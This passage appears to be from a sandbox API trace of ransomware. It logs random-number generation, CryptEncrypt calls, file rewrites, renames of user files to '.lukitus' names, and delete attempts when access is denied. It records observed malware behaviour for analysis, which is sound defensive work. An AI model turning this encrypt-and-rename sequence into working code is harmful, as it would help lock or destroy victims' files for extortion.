lDistanceToMove=24117248, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1700000 [0110.616] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.617] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.622] SetFilePointer (in: hFile=0x328, lDistanceToMove=24641536, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1780000 [0110.622] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.625] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.630] SetFilePointer (in: hFile=0x328, lDistanceToMove=25165824, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1800000 [0110.630] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.631] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.632] SetFilePointer (in: hFile=0x328, lDistanceToMove=25690112, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1880000 [0110.632] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0110.632] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x7b8a, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x7b8a, lpOverlapped=0x0) returned 1 [0110.637] SetFilePointer (in: hFile=0x328, lDistanceToMove=26214400, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x1900000 [0110.637] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x7b8a, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x7b8a, lpOverlapped=0x0) returned 1 [0110.637] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0110.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x65f848d0, dwHighDateTime=0x1d31760)) [0110.637] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0110.637] FlushFileBuffers (hFile=0x328) returned 1 [0110.845] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\aclviho asldjfl.contact"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7133b2c0, ftCreationTime.dwHighDateTime=0x1d2fb2c, ftLastAccessTime.dwLowDateTime=0x7133b2c0, ftLastAccessTime.dwHighDateTime=0x1d2fb2c, ftLastWriteTime.dwLowDateTime=0x7133b2c0, ftLastWriteTime.dwHighDateTime=0x1d2fb2c, nFileSizeHigh=0x0, nFileSizeLow=0x49a)) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0110.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0110.846] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0110.846] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="c:\\Users\\aETAdzjz\\Contacts\\F56924BE-9663-41BB-9708D0B4-8FF0AA0A752D.lukitus" (normalized: "c:\\users\\aetadzjz\\contacts\\f56924be-9663-41bb-9708d0b4-8ff0aa0a752d.lukitus"), dwFlags=0x9) returned 1 [0110.849] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0110.849] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0110.859] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x49a, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x49a, lpOverlapped=0x0) returned 1 [0110.860] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0110.860] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x49a, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x49a, lpOverlapped=0x0) returned 1 [0110.860] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0110.860] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x66199c10, dwHighDateTime=0x1d31760)) [0110.860] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0110.860] FlushFileBuffers (hFile=0x328) returned 1 [0110.863] GetFileAttributesExW (in: lpFileName="c:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31fc7330, ftCreationTime.dwHighDateTime=0x1d2f18b, ftLastAccessTime.dwLowDateTime=0x31fc7330, ftLastAccessTime.dwHighDateTime=0x1d2f18b, ftLastWriteTime.dwLowDateTime=0x33428f90, ftLastWriteTime.dwHighDateTime=0x1d2f18b, nFileSizeHigh=0x0, nFileSizeLow=0xa4)) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0110.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0110.863] CreateFileW (lpFileName="c:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.863] GetLastError () returned 0x5 [0110.863] RaiseException (dwExceptionCode=0xe06d7363, dwExceptionFlags=0x1, nNumberOfArguments=0x3, lpArguments=0x281f558) [0110.864] GetLastError () returned 0x5 [0110.864] SetLastError (dwErrCode=0x5) [0110.864] RtlUnwind (TargetFrame=0x281fcac, TargetIp=0x40148b, ExceptionRecord=0x281f028, ReturnValue=0x0) [0110.864] GetLastError () returned 0x5 [0110.864] SetLastError (dwErrCode=0x5) [0110.864] GetLastError () returned 0x5 [0110.864] SetLastError (dwErrCode=0x5) [0110.864] GetLastError () returned 0x5 [0110.864] SetLastError (dwErrCode=0x5) [0110.864] GetLastError () returned 0x5 [0110.864] SetLastError (dwErrCode=0x5) [0110.864] GetLastError () returned 0x5 [0110.864] SetLastError (dwErrCode=0x5) [0110.864] GetLastError () returned 0x5 [0110.864] SetLastError (dwErrCode=0x5) [0110.864] GetLastError () returned 0x5 [0110.864] SetLastError (dwErrCode=0x5) [0110.864] GetLastError () returned 0x5 [0110.864] SetLastError (dwErrCode=0x5) [0110.864] GetLastError () returned 0x5 [0110.864] SetLastError (dwErrCode=0x5) [0110.864] GetLastError () returned 0x5 [0110.864] SetLastError (dwErrCode=0x5) [0110.864] GetLastError () returned 0x5 [0110.864] SetLastError (dwErrCode=0x5) [0110.864] GetLastError () returned 0x5 [0110.864] SetLastError (dwErrCode=0x5) [0110.864] GetLastError () returned 0x5 [0110.864] SetLastError (dwErrCode=0x5) [0110.864] GetLastError () returned 0x5 [0110.864] SetLastError (dwErrCode=0x5) [0110.864] CreateFileW (lpFileName="c:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x328 [0110.864] CreateFileW (lpFileName="c:\\ProgramData\\Mozilla\\logs\\F56924BE-9663-41BB-8141530E-5B53D2BEEFEB.lukitus" (normalized: "c:\\programdata\\mozilla\\logs\\f56924be-9663-41bb-8141530e-5b53d2beefeb.lukitus"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x324 [0110.865] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0110.865] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0110.870] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xa4, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xa4, lpOverlapped=0x0) returned 1 [0110.871] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xa4, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xa4, lpOverlapped=0x0) returned 1 [0110.871] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0110.871] FlushFileBuffers (hFile=0x324) returned 1 [0110.874] CreateFileW (lpFileName="c:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log"), dwDesiredAccess=0x40000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.874] GetLastError () returned 0x5 [0110.874] RaiseException (dwExceptionCode=0xe06d7363, dwExceptionFlags=0x1, nNumberOfArguments=0x3, lpArguments=0x281f468) [0110.874] GetLastError () returned 0x5 [0110.874] SetLastError (dwErrCode=0x5) [0110.874] RtlUnwind (TargetFrame=0x281f584, TargetIp=0x40148b, ExceptionRecord=0x281ef38, ReturnValue=0x0) [0110.874] GetLastError () returned 0x5 [0110.874] SetLastError (dwErrCode=0x5) [0110.874] GetLastError () returned 0x5 [0110.874] SetLastError (dwErrCode=0x5) [0110.874] GetLastError () returned 0x5 [0110.874] SetLastError (dwErrCode=0x5) [0110.874] GetLastError () returned 0x5 [0110.874] SetLastError (dwErrCode=0x5) [0110.874] GetLastError () returned 0x5 [0110.874] SetLastError (dwErrCode=0x5) [0110.874] GetLastError () returned 0x5 [0110.874] SetLastError (dwErrCode=0x5) [0110.874] GetLastError () returned 0x5 [0110.874] SetLastError (dwErrCode=0x5) [0110.874] GetLastError () returned 0x5 [0110.874] SetLastError (dwErrCode=0x5) [0110.874] GetLastError () returned 0x5 [0110.874] SetLastError (dwErrCode=0x5) [0110.874] GetLastError () returned 0x5 [0110.874] SetLastError (dwErrCode=0x5) [0110.874] GetLastError () returned 0x5 [0110.875] SetLastError (dwErrCode=0x5) [0110.875] GetLastError () returned 0x5 [0110.875] SetLastError (dwErrCode=0x5) [0110.875] GetLastError () returned 0x5 [0110.875] SetLastError (dwErrCode=0x5) [0110.875] GetLastError () returned 0x5 [0110.875] SetLastError (dwErrCode=0x5) [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.875] MoveFileExW (lpExistingFileName="c:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log"), lpNewFileName="c:\\ProgramData\\Mozilla\\logs\\F176919E2FDBB656461BC74C80CF566C.tmp" (normalized: "c:\\programdata\\mozilla\\logs\\f176919e2fdbb656461bc74c80cf566c.tmp"), dwFlags=0x8) returned 0 [0110.875] DeleteFileW (lpFileName="c:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log")) returned 0 [0110.876] GetFileAttributesExW (in: lpFileName="c:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf549ba0, ftCreationTime.dwHighDateTime=0x1d2f181, ftLastAccessTime.dwLowDateTime=0xf549ba0, ftLastAccessTime.dwHighDateTime=0x1d2f181, ftLastWriteTime.dwLowDateTime=0xa555e540, ftLastWriteTime.dwHighDateTime=0x1d30618, nFileSizeHigh=0x0, nFileSizeLow=0x75000)) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] CryptGenRandom (in: 